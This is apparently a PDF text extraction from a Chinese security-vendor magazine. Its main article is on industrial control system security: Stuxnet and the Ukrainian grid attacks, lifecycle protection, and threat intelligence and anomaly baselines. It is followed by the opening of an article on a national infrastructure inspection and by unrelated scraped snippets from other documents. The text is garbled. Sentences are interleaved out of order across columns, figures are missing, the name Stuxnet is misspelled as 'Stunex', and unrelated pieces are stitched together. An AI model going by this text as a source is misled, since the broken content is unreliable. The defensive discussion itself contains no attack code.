年 6 月份首次被检测出来的 Stunex 病毒是一种专门定向 51

54 行业热点 攻击真实世界中核电站, 水坝, 国家电网等能源基础设施的 蠕虫 病毒 它的攻击给伊朗核电站中西门子公司的 SIMATIC WinCC 系统造成了巨大的破坏, 最终使得伊朗核电站的离心机运行失控, 同时掩盖发生故障的情况, 谎报军情, 以 正常运转 记录回传给管理部门, 造成决策的误判 这种病毒可能给伊朗布什尔核电站造成严重影响, 导致有毒的放射性物质泄漏, 其危害甚至不亚于 1986 的工控系统的安全检查 持续发酵的工控安全事件让工控安全的影响上升到了一个前所未有的高度 工控系统生命周期的安全之觞工控系统生命周期一般包含七个阶段, 分别是设计阶段 选型阶段 测试阶段 建设阶段 运行阶段 检修阶段以及废弃阶段 年发生的切尔诺贝利核电站事故, 给伊朗的核设施造成了不可估量的影响 同时, 该病毒还感染了全球超过 个网络, 给很多国家和地区的基础设施带去了严重的安全隐患 这一年, 工控系统信息安全被人们真正重视了起来, 工控系统信息安全元年就此诞生, 而这仅仅是个开始 在震网病毒之后,2011 年的 Duqu 病毒,2012 年的 Flame 病毒以及 2014 年的 Havex 病毒又席卷了全球工控网络, 这些病毒以获取权限并搜集大量数据为目标, 潜伏在数以万计的工控系统之中 大大小小的针对工控系统的攻击随着工控网络信息化的发展而愈演愈烈 在 2015 年 12 月份和 2016 年 1 月份发生的乌克兰电力系统攻击事件让工控安全彻彻底底的火了一把, 这次攻击事件导致数以百万的居民在黑暗中度过了圣诞节, 停电持续了十数个小时 和 2010 年发生的 Stunex 事件一样, 这也是一次有组织有预谋的安全事件, 攻 击者通过鱼叉式钓鱼邮件植入的恶意代码直接对变电站系统的程序界面进行控制, 控制远程设备的运行状态, 直接切断供电线路, 导致对应线路断电 这一事件的发生再一次加强了各国针对工控系统信息安全的重视程度, 很多国家和地区都首次开展了针对能源等行业 图 1 工控系统生命周期而在几乎已转入 install base 存量市场的自动化领域, 工业控制系统在设计初期几乎没有考虑过信息安全的因素, 选型阶段也不会囊括信息安全相关的装置设施 在整个工控系统的全生命周期, 信 52

55 行业热点 息安全并没有作为不可缺少的一环贯穿其中, 这直接导致了工控系统的脆弱性和风险性 在工控系统的全生命周期中, 被重点考虑的安全环节主要是功能安全 随着工业生产过程的控制规模在不断扩大, 复杂程度不断增加, 工艺过程不断强化, 对工业控制系统的要求也越来越高 在生产过程中, 用于监视生产过程, 在危险条件下采取相应措施防止危险事件发生的功能安全相关系统在工控系统的全生命周期中扮演了重要的角色, 比如安全仪表系统就属于工厂控制系统中的报警和联锁部分, 对控制系统中检测的结果实施报警动作或调节或停机控制 图 2 功能安全 又比如盛有可燃性液体的容器内液位开关的动作, 当液位到达潜在的危险值时, 液位开关就会关闭阀门阻止更多的液体进入容器, 从而阻止了液体从容器溢出, 这一过程的正确执行就是功能安全的一种 在工控系统建设的各个阶段, 功能安全都贯穿其中 然而, 即使这样, 工业安全事故仍然在不断发生 愈演愈烈的工业安全事件让工业信息安全逐步引起了关注 无论是震网病毒事件还是乌克兰电力系统攻击事件, 都是融合了被攻击环境的业务场景的安全攻击 图 3 融合业务的攻击聚焦攻击者不仅掌握了信息安全的攻击技巧, 更是对功能安全与业务场景了如指掌 工业控制系统, 正面临着与业务融合的深度攻击的安全威胁, 只考虑功能安全的工控系统已经很难在工业化和信息化融合的 万花丛中做到片叶不沾身 未将信息安全融入工控系统全生命周期的工业设施必定存在安全之觞 工控系统的综合保障思考在当今的大时代背景下考虑工控安全, 就是要把信息安全融入工控系统安全建设的全生命周期当中, 贯穿始终 如图 4 所示, 可以从四个维度 三个阶段将工控系统信息安全做深做精 1. 安全理念层面, 考虑从传统功能安全的安全监视向基于信息安全的安全防护体系进发, 最终形成持续可运营的工控安全运营模式 ; 2. 安全防护层面, 从边界安全向纵深防御领域迈进, 最终形成基于设备本体的基因安全防护体系 ; 3. 安全需求层面, 实现从最初的合规性需求满足到业务本体安全需求的进步 ; 4. 最后, 在全生命周期中, 将功能安全与信息安全进行全方位的深度融合 具体到全生命周期的每个阶段, 可以得出如下建设思路 53

56 行业热点 图 4 1. 在工控系统的设计阶段将信息安全因素考虑其中, 给出成型的系统建设信息安全解决方案 ; 2. 在设备选型阶段, 选择成熟的融合信息安全的工业控制系统 (DCS PLC RTU IED 等 ) 和经过严格测试和认证的全线工控安全产品 ; 3. 在测试阶段通过漏洞检测与挖掘技术对已成型的系统进行严 图 5 工控系统全生命周期安全建设工控安全与威胁情报的深度融合一切攻击皆有迹可循, 针对工控系统的攻击也不例外 从关联角度分析, 由于 ERP 系统和 MES 系统打通了连接, 而 MES 系统又和生产控制系统有业务关联, 因此传统信息系统的风险就被带入了 格的安全测试, 通过渗透测试 漏洞扫描 漏洞挖掘等方式发现系统存在的安全隐患并进行加固和修复 ; 4. 在运行阶段通过非法入侵检测与异常行为安全审计等手段实现安全管理 ; 5. 在系统检修阶段继续通过漏洞扫描 漏洞挖掘等手段对系统进行二次安全测试 ; 6. 在废弃阶段对系统残余风险进行确认, 确保系统正常报废无 风险遗留 图 6 工控信息安全防护面临的困境 54

57 行业热点 生产控制系统 虽然目前工控安全产品众多, 但真正能解决安全问题的适用性技术手段却少之又少 当前工控系统信息安全防护面临的困境主要有以下几点 : 基于以上几点分析, 传统信息系统层面大有可为的威胁情报分析技术同样适用于工业控制系统安全领域, 通过安全威胁情报技术建设安全威胁情报平台仍不失为一种有效的安全管理手段 一般而言, 针对工控系统的入侵行为有以下几种特点 : 1. 在 企业阶段, 它在渗透到 HMI 之 网设备信息, 如工控设备 服务器 DNS 路由器 智能设备等 ; 可以实时判断公网上的应用信息, 如 WEB 服务 FTP 服务 TELNET 服务 代理等服务 ; 也可以将搭建好的蜜罐系统放置于公网, 伪装成 PLC 等工控设备, 接收 Eripp Shodan Zoomeye 等方式的探测, 收集针对工控系统不同攻击手段的威胁情报 最终, 将公网威胁情报与工控系统所在的生产控制网络的不同工控设备的安全行为等信息进行整合, 形成内外结合的工控安全威胁情报体系 整体架构如图 7 所示 : 工控安全威胁情报体系架构通过工控安全预警平台对外部的威胁事件进行样本分析, 将成型的情报信息推送到位于安全区的生产控制网络 即可通过主网络通道共享数据, 也可通过私有加密协议进行数据传输, 最终将情报数据从非安全区传入安全区, 实现情报信息的共享, 同时位于安全区的监测类装置可根据威胁报告进行规则和策略的调优处理 具体网络结构如 前会寻找一个目标 HMI 2. 在 工业阶段, 它感染了 HMI, 并寻找目标 PLC, 然后再变化, 把恶意代码注入 PLC 中 3. 在 运行阶段, 在注入指令破坏进程前, 它会利用 PLC 寻找以特定参数运行的 IED 等被控设备有了攻击的行为特征, 就有了判断攻击行为的依据, 进而可以依托于威胁情报平台收集威胁情报数据 通过搭建好的企业威 胁情报平台, 可以实时爬去公网上存在的公 图 7 工控安全预警平台 55

58 行业热点 比如预警平台从生产控制网络的资产行为中建立了一组正常行为基线, 即到一组 PLC 的 Modbus 所有通信都是来自于相同的 3 个 HMI 工作站, 标记为基线 A 在运营过程中发现监控系统报警, 与基线 A 出现分歧, 出现了第 4 个系统与 PLC 进行通信, 判断其可能的表现有四种 : 一个新的未被授权的设备被插入网络中 ( 如一台管理员的笔记本电脑 ); 一个使用欺诈 IP 地址的恶意 HMI 正在运行 ; 新的系统安装上线 通过对近期公网的威胁情报及生产控制网络近期操作行为的整合分析, 得知该异常是由于未被授权的设备接入网络所导致 前行中的工控安全之路基于全生命周期的工控系统安全综合保障手段的建设, 给传统的单点安全防护提供了新的思路 将功能安全 信息安全 威胁情报进行深度融合的工控安全预警平台, 连接了孤军奋战的单个结点, 融入了故障诊断 异常告警 态势感知 攻击检测等持续可运营的安全防护理念, 最大限度的保障工业控制系统稳定 高效 安全的运行 绿盟科技工控安全绿盟科技作为国内最早一批从事信息安全的公司, 早已开始了对工控安全的战略部署, 投入大量的人力物力, 现已推出 5 款工控安全产品, 分别是工控入侵检测系统, 工控安全审计系统, 工控漏洞扫描系统, 工业安全网关, 工业安全隔离装置 针对不同的工业环境, 绿盟科技结合实际业务情况给出切实有效的防护方案, 帮助用户轻松应对工业控制系统的安全风险, 保障业务的顺利运行 绿盟科技在电力行业 石油石化行业 烟草行业工控安全领域有着丰富的行业经验, 根据多年工控安全研究经验总结出工业控 制系统的攻击路线图, 并在此基础上给出工控系统总体安全保障框架, 框架基于绿盟科技对工控系统安全需求的理解, 结合国内工控安全的规范要求及国外相关标准内容, 提出从技术 管理和运行三个维度来保障工控系统安全, 这些维度包含网络边界防护 安全纵深防护 安全运行管理和安全管理制度要求等几个方面, 涉及从上线前的安全检测 安全能力部署 安全运行三个阶段, 覆盖工业控制系统运行周期的安全保障, 为客户工控网络安全保驾护航 56

59 行业热点 运营商行业全国检查经验分享 安全服务部李贵鹏王岚西南服务交付部敖屹立运营管理部周慧芳 关键词 : 全国大检查运营商检查工作要点摘要 :7 月初, 网信办牵头组织全国关键信息基础设施网络安全检查,7 月中旬到 7 月底, 各省 ( 区 市 ) 网络安全和信息化领导小组与中央和国家机关开展检查启动会, 将统一领导本地区 本部门的网络安全检查工作, 各省 ( 区 市 ) 网信办统筹组织本地区检查工作, 预计将持续到 12 月底 全国级别的检查项目与省内或部门级别的单次安全评估或者检查项目有很大的区别, 容易犯错的点也不太一样, 归结起来就是 船大难调头, 需要预判各类风险并且设计应对措施 一. 背景 融 能源 电力 通信 交通等领域的关键信息基础设施是经济社 会运行的神经中枢, 是网络安全的重中之重, 也是可能遭到重点攻 击的目标, 要求 要全面加强网络安全检查, 摸清家底, 认清风险, 找出漏洞, 通报结果, 督促整改 当前, 我国关键信息基础设施面临的网络安全形势严峻复杂, 大量党政机关网络被攻击篡改, 网站平台大规模数据泄露事件频发, 生产业务系统安全隐患突出, 甚至有的系统长期被控, 面对高级别持续性的网络攻击, 防护能力十分欠缺, 加之网络安全威胁具有很强的隐蔽性, 谁进来了不知道 是敌是友不知道 干了什么不知道, 亟须摸清家底加强风险评估和防范 随即,7 月初, 网信办牵头组织全国关键信息基础设施网络安 4 月 19 日, 习近平总书记在网络安全和信息化工作座谈会上对 关键信息基础设施保护和网络安全检查工作做了精辟论述, 指出 : 金 全检查,7 月中旬到 7 月底, 各省 ( 区 市 ) 网络安全和信息化领导 小组与中央和国家机关开展检查启动会, 将统一领导本地区 本部门 57

长 安 大 学 硕 士 学 位 论 文 基 于 数 据 仓 库 和 数 据 挖 掘 的 行 为 分 析 研 究 姓 名 : 杨 雅 薇 申 请 学 位 级 别 : 硕 士 专 业 : 计 算 机 软 件 与 理 论 指 导 教 师 : 张 卫 钢 20100530 长安大学硕士学位论文 3 1 3系统架构设计 行为分析数据仓库的应用模型由四部分组成 如图3 3所示

More information

工程项目进度管理 西北工业大学管理学院 黄柯鑫博士 甘特图 A B C D E F G 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 甘特图的优点 : 直观明了 ( 图形化概要 ); 简单易懂 ( 易于理解 ); 应用广泛 ( 技术通用 ) 甘特图的缺点 : 不能清晰表示活动间的逻辑关系 WBS 责任分配矩阵 ( 负责〇审批

More information

文章首先对 云计算 环境下数字图书馆的概念 特点 原理等进行概述 然后根据 云计算 环境下图书馆数字资源安全性要求 对影响数字图书馆安全的诸多因素进行深入探讨 最后研究了云计算环境下数字图书馆数据安全 应用安全以及虚拟化安全面临的威胁及对策 云计算数字图书馆信息安全对策 本文系甘肃省教育厅 年度科研项目 移动计算环境下的数字图书馆建设研究 批准号 的研究成果之一 马晓亭 女 年生 兰州商学院信息工程学院副教授

More information

关于罗斯福时代新政 宪法革命 的几点浅见 韩 铁 美国宪法的若干重要法理原则及其运用在富兰克林 罗斯福总统任内 发生了巨大变化 史称新政 宪法革命 不过 这种变化并不是在所谓 年最高法院的 及时转向 中一锤定音的 最高法院在正当程序 商业权 公众福利条款上的态度及其变化充分说明 新政宪法革命无论是从当时还是其后的发展来看都有它的连续性 局限性和复杂性 只有认识到了这一点 我们对新政宪法革命乃至于整个新政的历史评价才会比较准确

More information

水晶分析师

水晶分析师 大数据时代的挑战 产品定位 体系架构 功能特点 大数据处理平台 行业大数据应用 IT 基础设施 数据源 Hadoop Yarn 终端 统一管理和监控中心(Deploy,Configure,monitor,Manage) Master Servers TRS CRYSTAL MPP Flat Files Applications&DBs ETL&DI Products 技术指标 1 TRS

More information

,,,,,,, ;,, ;, ;, (, / ),, ;,,.,,,,,,,,,,,,,,,,, ;,,,,,,, 1, :,,, ;,,,, (, ),,,,, 1,,, (,, )

,,,,,,, ;,, ;, ;, (, / ),, ;,,.,,,,,,,,,,,,,,,,, ;,,,,,,, 1, :,,, ;,,,, (, ),,,,, 1,,, (,, ) 刘世定 内容提要 : 本文在嵌入性视角的引导下, 进入关系合同理论领域 对关系合同的 分析, 以威廉姆森的合同治理结构理论作为基点 在分析了他的理论脉络和隐含假 设后, 本文提出了三个假定, 即约前关系导入 多元关系属性 对关系属性的有限控 制 在新的假设下, 首先讨论了合同治理结构和嵌入关系结构之间不同的对应关系, 并特别探讨了两者间的结构性摩擦 继而, 在关系合同的研究中引入了委托 - 代理关系,

More information

方正集团品牌传播日常监测

方正集团品牌传播日常监测 1986-2009 1 1986-2009 2 1986-2009 3 1986-2009 4 1986-2009 5 1986-2009 6 1986-2009 1 2 7 1986-2009 8 1986-2009 PC 15 8 7 5-7 9 1986-2009 10 1986-2009 11 1986-2009 IT AFC IT 5 AFC 12 1986-2009 13 1986-2009

More information

# # # # # # # # #

# # # # # # # # # 实现政治问责的三条道路 马 骏 建立一个对人民负责的政府是现代国家治理的核心问题 实现这一目标 需要解决两个最基本的问题 谁来使用权力 如何使用权力 选举制度是解决前一问题相对较好的制度 而预算制度是解决第二个问题最好的制度 通过历史比较分析 可以总结出三条实现政治问责的道路 世纪的欧洲道路 从建国到进步时代改革的美国道路以及雏形初现的中国道路 这意味着 西方经验并不是唯一的实现政治问责的道路 相对于西方经验来说

More information

宋守信 教授 杨书宏 教授级高工 傅 贵 教授 许开立 教授 高等工程教育专业认证委员会安全工程专业试点工作组 北京交通大学经济管理学院 北京 中国职业安全健康协会培训部 北京 中国矿业大学 北京 资源与安全工程学院 北京 东北大学资源与土木工程学院 沈阳 简要介绍我国高等工程教育专业认证试点的发展状况和主要做法 详细阐述安全工程专业认证以学生为本的指导思想和以质量保证及质量改进为出发点的基本特点

More information

应 用 为 先, 统 筹 规 划 摘 要 : 总 体 上 看, 我 国 的 云 计 算 还 没 有 进 入 良 性 发 展 的 轨 道 目 前 的 形 势 是 政 府 比 企 业 积 极, 企 业 比 用 户 积 极, 大 企 业 比 中 小 企 业 积 极, 建 设 数 据 中 心 比 推 广 应

应 用 为 先, 统 筹 规 划 摘 要 : 总 体 上 看, 我 国 的 云 计 算 还 没 有 进 入 良 性 发 展 的 轨 道 目 前 的 形 势 是 政 府 比 企 业 积 极, 企 业 比 用 户 积 极, 大 企 业 比 中 小 企 业 积 极, 建 设 数 据 中 心 比 推 广 应 国 家 信 息 化 专 家 咨 询 委 员 会 2011 年 课 题 研 究 报 告 信 息 技 术 与 新 兴 产 业 专 业 委 员 会 内 部 资 料 注 意 保 存 应 用 为 先, 统 筹 规 划 对 政 府 引 领 云 计 算 健 康 发 展 的 建 议 国 家 信 息 化 专 家 咨 询 委 员 会 云 计 算 技 术 产 业 与 应 用 研 究 咨 询 课 题 组 二 〇 一 二 年

More information

!!

!! 涂正革 肖 耿 本文根据中国 个省市地区 年规模以上工业企业投入 产出和污染排放数据 构建环境生产前沿函数模型 解析中国工业增长的源泉 特别是环境管制和产业环境结构变化对工业增长模式转变的影响 研究发现 现阶段中国工业快速增长的同时 污染排放总体上增长缓慢 环境全要素生产率已成为中国工业高速增长 污染减少的核心动力 环境管制对中国工业增长尚未起到实质性抑制作用 产业环境结构优化对经济增长 污染减少的贡献日益增大

More information

邀请函1

邀请函1 2015 企业级 IT 服务与软件应用创新峰会 上海市计算机用户协会 上海市通信学会 2015 企业级 IT 服务与软件应用创新峰会 主办单位 : 支持单位 : 承办单位 : 企业级 IT 服务与软件应用创新峰会 大会拟定日程安排 合作支持媒体 参加行业及人员 相关软件开发 系统集成 信息安全 数据中心建设与运营 电信运营公司 医疗机 构 教育科研 互联网 金融保险 制造业 能源 电力 石化 交通运输

More information

欧洲研究 年第 期

欧洲研究 年第 期 论中欧伙伴关系中的不对称性与对称性 周 弘 在自然界和人类社会中都充满了不对称性和对称性的复杂关系 其中潜藏着挑战 也蕴涵着动力和机遇 这种现象同样存在于中欧关系之中 中欧关系中的不对称性表现在经济社会 政治制度和历史文化等三个主要方面 在这些不对称性中同时又包含着对称性 并孕育着发展中欧伙伴关系的机遇 中欧双方需要相互理解对方的 方式 寻求对称性与互补性 创造共赢局面 推动合作伙伴关系的继续发展

More information

中国与欧洲关系 年

中国与欧洲关系 年 中国与欧洲关系 年 周 弘 本文全面回顾了中国与欧洲共同体 欧洲联盟及其成员国 年至 年间政治和经济关系的发展历程 分析了当前中欧关系取得的进展和存在的问题 作者认为 年来中国与欧洲关系的发展变化见证并体现了世界格局的演变以及中国和欧洲这两大很不相同的世界力量自身的发展变化 中欧之间不断深入和拓展的交往使双方都从中获益 而这种交往所创造出来的体制机制和方式方法也堪为人先 中欧关系能否在第二个 年中顺利发展

More information

中国社会科学 年第 期,,. % 1,,,. %,. % 2,, %, ;,,,, 3,,,, 4 ( ) ( ) ( ) (),, %, 5,,,,,,,,, 1 :,, ://.. / / - / /., 2 :,, 3 :, 4,,, 5 ( ),,, ( ),, ( ), ( ), ( );

中国社会科学 年第 期,,. % 1,,,. %,. % 2,, %, ;,,,, 3,,,, 4 ( ) ( ) ( ) (),, %, 5,,,,,,,,, 1 :,, ://.. / / - / /., 2 :,, 3 :, 4,,, 5 ( ),,, ( ),, ( ), ( ), ( ); 近年来农民工的经济状况和社会态度 李培林李炜 : 改革开放 年来, 农民工作为中国产业工人的组成部分, 成为支撑中国经济持续快速增长的重要力量 基于 年和 年 中国社会状况综合调查 的数据, 对近年来 特别是在国际金融危机背景下农民工的经济状况和社会态度进行分析, 结果显示, 年数据反映出农民工在收入水平较低 劳动强度较高的情况下, 却保持着较为积极的社会态度 ; 近两年的新变化是, 农民工的收入水平和社会保障水平都有了显著的提高,

More information

燃烧器电子控制系统 目录 2

燃烧器电子控制系统 目录 2 聚焦 REC27 燃烧器电子控制系统 燃烧器电子控制系统 目录 2 REC27 燃烧器电子控制系统 2 概述 燃烧器电子控制系统 2 2 2 2 2 A B1 B2 C D E 22 2 2 系统图示 2 2 2 2 2 2 主要特征及优点 燃烧器电子控制系统 2 2 集成控制 2 2 节能 安全运行 运行模式 远程锁定复位 可根据需求提供特殊机型 无接合间隙及机械迟滞 简单的试运行及燃烧器设定 2

More information

上海现代设计集团建筑协同设计平台研究与应用

上海现代设计集团建筑协同设计平台研究与应用 邓雪原 苏 昶 孙 朋 王国俭 上海交通大学土木工程系 上海 上海现代建筑设计 集团 有限公司 上海 本文首先分析了建筑 协同设计发展过程中存在的问题 指出建筑 协同设计的发展需要经过二维协同设计向三维协同设计的过渡 接着对适合于大型建筑设计企业的建筑 协同设计平台的关键问题进行了阐述 通过上海现代建筑设计集团一个实际工程项目 详细描述了建筑工程协同设计的方法与过程 然后对建筑协同设计的标准统一 工种协同等特点和高效沟通及超大项目的应用优势进行了讨论

More information

抗日战争研究 # 年第 期 % % % # % % % % # # # # # #

抗日战争研究 # 年第 期 % % % # % % % % # # # # # # 林 星 在以往的抗战内迁研究中 人们多关注中国沿海地区政府机构 工厂 学校 银行等向西南地区的迁移及其影响 但内迁还有一个重要构成部分 即在本省范围内的迁移 抗战爆发 后 随着省会迁往内地山区 东南沿海省份的工厂 学校 银行等纷纷迁移到本省内地山区 给当地 社会发展注入了新的活力 对内地城市现代化以及本省区域内城市体系的变动产生了深远的影响 为抗战的最终胜利提供了支持 然而内地城市的这种发展随着抗战结束后的回迁而又趋于沉寂

More information

欧洲研究 年第 期

欧洲研究 年第 期 气候变化与欧盟北极战略 何奇松 气候变暖改变了北极地缘政治环境 年 月 欧盟委员会通过了 欧盟与北极地区 通讯 年 月 欧盟理事会通过 北极问题决议 这两个文件基本上勾勒了欧盟的北极战略 即保障和维护北极地区及其居民的权利 促进北极资源的可持续利用以及北极多边治理 实际上 欧盟希望通过执行北极战略来体现欧盟作为全球气候政策的领先者 北极的经济价值驱使欧盟加入北极的地缘政治博弈 其中一个关键就是保证欧盟油气资源的供应

More information

»

» 世纪 年代以来 中国社会的城市化日新月异 全球化的消费社会也开始进入 我们的生活 中国的城市文学趋向活跃 年轻一代的作家表达了对城市的感受和反思 积极地探寻着新的审美表现力 但总体看来 城市文学依然很不充分 作家的视野中并没有深刻和开放的城市精神 文学作品没有找到表现更具有活力的城市生活状况的方式 城市文学依然是一种无法解放和现身的 他者 并且被无限期延搁于主体的历史之侧 城市 现代性 乡土 幽灵化

More information

孙 蓝等 基于目标导向的研究生英语学习模式创新

孙 蓝等 基于目标导向的研究生英语学习模式创新 第 期 总第 期 年 月 研究生教育研究 以中国科技大学研究生英语学习公共服务平台建设为例 孙 蓝 陈纪梁 邢鸿飞 刘海清 万洪英 中国科学技术大学外语系 安徽合肥 中国科学技术大学研究生院 安徽合肥 研究生英语教学的使命是培养学生在当今多元社会中进行有效沟通的能力 英语语言教育者的任务不是去寻求更好的教学法 而是要探索一套能够满足学生需求且与学生学习体验相一致的教与学的策略 为此 有必要构建研究生英语学习公共服务平台

More information

PureSCM enhances competitive advantage with an integrated approach to IT service level management

PureSCM enhances competitive advantage with an integrated approach to IT service level management ఱઓ߅ ښ PureSCM 使用集成的 IT 服 务级别管理方法增强竞争 优势 行业 IT 服务 公司 PureSCM 员工 40 收入 400 万美元 ఱઓ ቲጓǖIT 服务 ǖpurescm Ꮛ ǖ40 ၃ ǖ400 万美元 ጓᇗ PureSCM 是一家服务级别 管理专业公司和软件开发 公司 办事处设在加拿 大 美国和哥伦比亚 ᄞᐵ 为了帮助客户解决他们的 业务挑战 PureSCM 需要 提供集成的

More information

????????

???????? 深度学习 项目简介 葛丽丽 译 西蒙菲沙大学 教育学院 富有想像力的教育研究中心 电邮 ierg-ed@sfu.ca 网址: http://www.ierg.net 基本思想 开学的第一个星期 每个学生都会接到一个任意布置的主题 从此将围绕这个主题 进行深度学习 这些主题可能包括 鸟 苹果 马戏团 火车 和 太阳系 等内容 在接下来的小学 初中以及高中阶段 除了基本课程以外 学 生将继续深入地学习指定的题目

More information

水权定义 法律规定的用户获得水权的方式 法律规定的几种水相关许可 水利经济 电话 传真

水权定义 法律规定的用户获得水权的方式 法律规定的几种水相关许可 水利经济 电话 传真 美国犹他州水权管理制度及其对我国的启示 贾绍凤 曹 月 犹他州位于美国西部干旱区 水资源紧缺 是美国优先水权制度的发源地 具有完备而具体的水权管理制度 通过文献研究和利用电子邮件询问犹他州水权处官员的方法 分析 介绍美国犹他 州的水权管理制度 尤其是水权申请 登记 交易 水权管理机构设置 实施 信息查询等具体的制 度 以期为我国水权制度建设提供借鉴 水权制度 交易管理 犹他州 水利经济 电话 传真

More information

2. 全球机器人大佬都是谁? 3. 我国的差距在哪里? 2

2. 全球机器人大佬都是谁? 3. 我国的差距在哪里? 2 上海市机器人行业协会信息 2016 年第 4 期 ( 总第 12 期 ) 机器人产业发展规划 (2016-2020 年 ) 解读 1. 发展现状 1 2. 全球机器人大佬都是谁? 3. 我国的差距在哪里? 2 4. 需求在哪, 机会就在哪 5. 领头品类是工业生产和公共服务 3 4 6. 在这些行业主力推广使用 7. 五类关键零部件 5 8. 创新平台, 标准体系, 检测认证, 一个都不能少 9.

More information

¹ º» ¼ ½ ¹ º» ¼ ½

¹ º» ¼ ½ ¹ º» ¼ ½ 战争制胜的秘密 评 军事力量 解释现代战争中的 胜利与失败 李 卓 近年来 美国国际安全研究中关于军事行动制胜因素的研究非常活跃 本文评述了此类研究的代表人物比德尔的 军事力量 解释现代战争中的胜利与失败 一书 对书中提出的 军事力量部署差异制胜论 的研究问题 分析框架 经验论证等主要研究环节进行了归纳和梳理 本文从理论 方法论等角度总结了此书的成就 认为该书通过构建以 军事力量部署 这一非物质变量为核心的安全理论

More information

( ),,,,,,,, ` ', :,,,,??? :,, ( : ~, ) : ( ) :,, ( ),,,,, ~ :, :,,,,, ( ),,,,,,, :, :, ( )? :, ( ) :, :

( ),,,,,,,, ` ', :,,,,??? :,, ( : ~, ) : ( ) :,, ( ),,,,, ~ :, :,,,,, ( ),,,,,,, :, :, ( )? :, ( ) :, : ( ) 吴易风 : 本文考察了当前金融危机和经济危机背景下西方经济思潮的新动向 : 对资本主义的反思和对 新资本主义 的构想 ; 对新自由主义的反思和对新国家干预主义的构想 ; 对自由市场经济体制与政策体系的反思和对 市场与政府平衡 的市场经济体制与政策体系的构想 ; 对经济全球化的反思和对全球经济新秩序的构想 ; 对西方经济学的质疑和对马克思经济学的再认识 本文最后对西方经济思潮的新动向作了分析和评论

More information

一 登录 crm Mobile 系统 : 输入 ShijiCare 用户名和密码, 登录系统, 如图所示 : 第 2 页共 32 页

一 登录 crm Mobile 系统 : 输入 ShijiCare 用户名和密码, 登录系统, 如图所示 : 第 2 页共 32 页 第 1 页共 32 页 crm Mobile V1.0 for IOS 用户手册 一 登录 crm Mobile 系统 : 输入 ShijiCare 用户名和密码, 登录系统, 如图所示 : 第 2 页共 32 页 二 crm Mobile 界面介绍 : 第 3 页共 32 页 三 新建 (New) 功能使用说明 1 选择产品 第 4 页共 32 页 2 填写问题的简要描述和详细描述 第 5 页共

More information

展会手册07

展会手册07 会议亮点 超过 5 万人次的参会人流, 为上海世界旅游博览会重点板块之一 您可以搭建自己国家或企业的个性化的专题展 为您提供商务会议与现场福利采购的洽谈平台 四十余家专业媒体宣传力度, 给您提供一个在中国聚焦展示的舞台 百余企业高管参与的高峰会议 千余专业人士观展和参与的主题宣传秀 是世界医疗旅游同行的大聚会, 是您拓展中国与全球市场的良机 为您搭建与全球医疗机构 医疗旅游服务商 发展商联系的窗口

More information

01

01 Zebra 技术白皮书 零售业中的可跟踪性 降低 介质成本, 实现最佳价值 概要 简介 我想要的商品在哪里呢? 物品级标签带来了巨大优势 全面的库存管理 100% 2 Zebra (EAS)/ 实际结果 2009 1 27% 21% 53 2 209 提升顾客体验, 提高销售业绩 3 150 100 RF 1. : Bloomingdale 2009 2. 3. ABI Research 2009

More information

<4D F736F F D20B2CEBFBC3231C6DAD1A7CFB0D3EBCBBCBFBCC4DAD2B3>

<4D F736F F D20B2CEBFBC3231C6DAD1A7CFB0D3EBCBBCBFBCC4DAD2B3> - 1 - 学习 决定 应把握的十大看点和亮点 - 2 - - 3 - - 4 - - 5 - - 6 - - 7 - - 8 - - 9 - - 10 - - 11 - - 12 - - 13 - 开县新型城镇化建设的途径与对策初探 - 14 - - 15 - - 16 - - 17 - - 18 - 上接第 23 页 加快发展 推动 发展 - 19 - - 20 - - 21 - - 22 -

More information

% %

% % 兼论 上海城市人文历史地图的制作和运用 苏智良! 吴俊范 #! 由于地理学与历史学之间存在着学科分野的界限 致使已往的 景观概念缺乏全面性 其结果是 不仅地理学的景观研究缺少历史的底蕴与含量 而且历史学领域内系统的景观史研究也一直处于缺失状态 本文分别从宏观的理论角度和以 上海城市人文历史地图为中心例证 探讨在新的景观概念基础上和现代科学技术条件下 研究区域景观史的必要性 可行性以及具体的研究路径与操作方法

More information

日本学刊 年第 期!!

日本学刊 年第 期!! 日本对华直接投资与贸易增长变化分析 裴长洪 张青松 年日本丧失中国最大贸易伙伴的地位 这与日本 年以来对华投资增速放缓 占外商对华投资中的比重下降有着密切关系 只要日资企业继续提升投资结构和技术水平 从边际产业转向比较优势产业 从劳动密集型转向资本和技术密集型 就能带动设备和产品对中国的出口 使中国从日本进口增长速度和规模始终保持领先地位 这样 日本仍有可能恢复中国最大贸易伙伴的地位 对华直接投资

More information

英雄主义及其在后新时期中国文艺中的显现方式 英雄主义作为一种精神价值观 始终激励着一个民族不断进取和奋进 英雄主义人物形象塑造在中国的现当代文学中经历了人与神 鬼 兽之间的挣扎过程 世纪开端 中国文艺的后新时期到来了 主导文艺发展的既不是政治也不是艺术作品本身 一双无形的手紧紧抓住了文艺发展的脉搏 中国社会进入市场化的消费型时代 红色经典 的出现 使我们思考在无情的市场中如何显示出英雄主义有情的特色

More information

01

01 ZEBRA 技术白皮书 条码编码 101 相关知识介绍 引言 20 70 数据 80 20 90 (JIT) AIAG EIA HIBCC HAZMAT 条码的优势提高数据准确性 99% 85% / / 提升效率 / 2 Zebra Technologies 保持一致性 ID 改进库存和资产管理 成本 / 效益分析 ID ID ID (ERP) RFID Zebra Technologies 3 ID

More information

昆曲青春版 牡丹亭 跨文化传播的意义 胡 丽 娜 青春版 牡丹亭 不仅在中国本土掀起了昆曲热潮 而且为昆曲在世界范围内的推广做出了重要贡献 成为中国传统戏曲跨文化传播的经典个案 回顾 世纪以来 牡丹亭 跨文化传播的历程 青春版 牡丹亭 对昆曲的播扬可谓居功至伟 它将商业运作与社会运作 相结合的战略 立足本土与辐射世界的双重定位 坚持传统与调和现代的审美准则 为当下中 国传统戏曲的跨文化传播提供了重要的经验和启示

More information

避孕方法的医控模式和自控模式有变化吗 郑晓瑛 任 强 避孕节育是生殖健康极为重要的内容 文章利用国家人口和计划生育委员会 年至 年全国生育节育抽样调查和全国计划生育 生殖健康调查数据 分析了已婚育龄人口在避孕模式上的 时空变化特征 在此基础上进一步研究了在已婚育龄人口的年龄 子女数和生活的不同区域环境等方 面避孕模式的时空变化 结果表明 在我国人口转变的过程中 低生育水平下的避孕模式以及推行避 孕节育知情选择后已婚育龄人口的避孕模式

More information

137677_Eta_press Folder-cn用的.indd

